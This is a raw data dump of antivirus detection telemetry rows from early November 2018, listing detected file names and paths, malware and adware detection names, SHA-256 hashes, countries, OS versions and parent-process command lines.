  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T09:37:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130404-3398a06b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_379cddb1\\AVSCAN-20181104-130248-25ED3402\\AVSCAN-20181104-130404-3398A06B', filesize=30468000, name='Adware/ANDR.Leadbolt.D.Gen.#M1.#R1'), hash='8e9cc4c8822b6f53680d3ddfa9ed3891642f31550647849f9ecd0dde27557ab4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:04:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='airinstallerrunner.exe', filepath='\\\\mybookliveduo\\public\\Software\\photoshop cs5\\payloads\\adobehelp\\airinstallerrunner.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='8d571b4da1ebfbbdcc99b019e67398672ab9928181faabd6f79b05e1734d13ce', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:wmBsWRBta0GDS5Wm.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T21:59:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203623-2d1bf551', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-203556-2746A838\\AVSCAN-20181104-203623-2D1BF551', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015db6e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015db6e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:39:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:43:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000621bc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp000621bc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160244-ca33fd0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-160228-C8277B88\\AVSCAN-20181104-160244-CA33FD0F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:34:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000012b', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000012b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:57:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134318-f4511529', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8214c55\\AVSCAN-20181104-134240-EEFE642A\\AVSCAN-20181104-134318-F4511529', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_client_bruteforce.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXb0.095\\Steam_Client_Bruteforce.exe', filesize=448000, name='TR/Dropper.MSIL.Gen.#M300.#R5111'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\Steam_Client_Bruteforce.zip\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-04T09:05:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='15eb155ec27f69585afeb73beb55b6c127ef0dd6', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\15eb155ec27f69585afeb73beb55b6c127ef0dd6', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='d5dd083b4ef9972c6a3b96bcec59b70b6aa0bfbbf4a2a7179747774dcd73d024', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sujets certification.exe', filepath='G:\\sujets certification.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='odb_k000.odb', filepath='\\\\?\\C:\\Program Files\\CMC\\Antivirus\\db\\odb_k000.odb', filesize=64000, name='Worm/Agent.64000.22.#M1.#R1'), hash='cc89a74b08d086e9ad57161bfee1f7f0c56802f3c6646bc3863ad41095fdaecc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:34:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141050-c8666738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_deb5c3d0\\AVSCAN-20181104-141030-C5C3CE21\\AVSCAN-20181104-141050-C8666738', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='1c70e47c5dcda1d5bba2698c8380c187376ca5d49950e4feea766d1c430432c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b6a5d1b195d1eb409fe870a4f10a1254a672a7ae7193739d1702f13e72bb41bb.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B6A5D1B195D1EB409FE870A4F10A1254A672A7AE7193739D1702F13E72BB41BB.VIR', filesize=512000, name='TR/Kryptik.nkkig.#M1.#R1'), hash='b6a5d1b195d1eb409fe870a4f10a1254a672a7ae7193739d1702f13e72bb41bb', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:52:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:58:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='464wqw3az.exe', filepath='C:\\Program Files\\E8NHFAYPF0\\464WQW3AZ.exe', filesize=1088000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='caaa9dbbd9f4903b95dcdf3950a0a123bdb438e849495b7deaa8c08e32d2a1e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173203-ef19b14a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15dbb0e0\\AVSCAN-20181024-231647-5F1E2250\\AVSCAN-20181102-173203-EF19B14A', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-031619-5d4a0d21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a2407d4\\AVSCAN-20181102-031556-598ABBEB\\AVSCAN-20181102-031619-5D4A0D21', filesize=2944000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='ea0f711f478b41a0d61d30e4c67f69bd5f3b69dd334dd9b3bd835deac9a63812', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101839-938f28bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101839-938F28BD', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095022-c7e6b8b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-095022-C7E6B8B7', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{3A1F223F-F8CB-4CCA-ACC0-B6B23267C51B} S-1-5-21-2542648671-3618714615-2715966978-1000:Brück-PC\\\\Brück:Interactive:LUA[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-225637-5fbe12f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64aab52c\\AVSCAN-20181102-225519-54E9F9E7\\AVSCAN-20181102-225637-5FBE12F9', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cb3aeb85672b049cef66c8ad748edf929944e4189f33ca2c6babc4a1e821c957', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\CB3AEB85672B049CEF66C8AD748EDF929944E4189F33CA2C6BABC4A1E821C957', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='cb3aeb85672b049cef66c8ad748edf929944e4189f33ca2c6babc4a1e821c957', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:06:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exb10284.37172\\setup.exe', filesize=3200000, name='TR/Agent.jfhnp.#M1.#R1'), hash='df60313db2a35ef52b9925d233ee8036d349ccaec47fe4762ff48246b46846fb', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2222296, timestamp='2018-11-02T17:06:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{437149C2-7CB7-40D9-B0F5-9D418878CB4F}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a52153d1258053141c602709f13091e0d88d222b27fae0267e45dc4cb0901351', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8FE8E6C2E3049B61A5DCEC440D458B7A20BF0FAD78258EC6ACA728F3735EC365', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='G:\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:29:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6028.34678\\miners\\c_ewbfcudaminer\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\cgm_1.5.2.rar\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2232776, timestamp='2018-11-02T03:13:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='material.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MATERIAL\\MATERIAL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:45:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pes2017.exe', filepath='\\\\?\\K:\\العاب\\كورة اصلى 3\\Pro Evolution Soccer 2017\\PES2017.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='ada3141bc4a7f2330f73878714c7985491449e05bc9420b08b05a0ea3d637855', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:02:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:47:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xfuibrcxt0w\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate -nolegacy', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=51200, timestamp='2018-11-02T19:12:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dvwu4pgdwg4\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540954542.5bd919ae2e13d', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Emtak\\68053478.exe', parentsize=670720, timestamp='2018-11-02T07:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20180816-131628-873254cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20180816-131155-64B3475B\\AVSCAN-20180816-131628-873254CB', filesize=5120000, name='Worm/Mofksys.bouem.#M1.#R1'), hash='e1abd92a3da59b29149b8e880496eb0822dee99579b87d39a2548442b66df943', metadata=Row(cmdline=None, country='NG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Common Files\\mcafee\\AMCore\\mcshield.exe', parentsize=1059168, timestamp='2018-11-02T16:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:51:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T23:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synhelper.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\5AE25600-6DA0-DC4B-AF50-5364DDF69E4F\\synhelper.exe', filesize=2496000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='fcd8a7c191ad93cfd047a8a2f6dceca9e0a3bac7ad803f5e3318ca7a82790366', metadata=Row(cmdline='{D70D0438-775B-4329-91D7-B33F584E2CE0} S-1-5-21-3832779081-352244687-2416646115-1000:saral-PC\\\\\\\\saral:Interactive:LUA[1]', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T07:53:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123530-cad55a51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9367480\\AVSCAN-20181102-090433-6F0A8272\\AVSCAN-20181102-123530-CAD55A51', filesize=9048000, name='PUA/Systweak.Gen4.#M1.#R1'), hash='ed27910f69c1e679452c4fde106d880ea11370edc70907a7e7819a7953702c01', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='googlechrome.a3x', filepath='G:\\MozillaFirefox\\GoogleChrome.a3x', filesize=0, name='WORM/Verecno.Gen2.#M2.#R101351'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T18:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='IT', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-02T19:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:33:49Z'), dt=datetime.date(2018, 11, 4)),
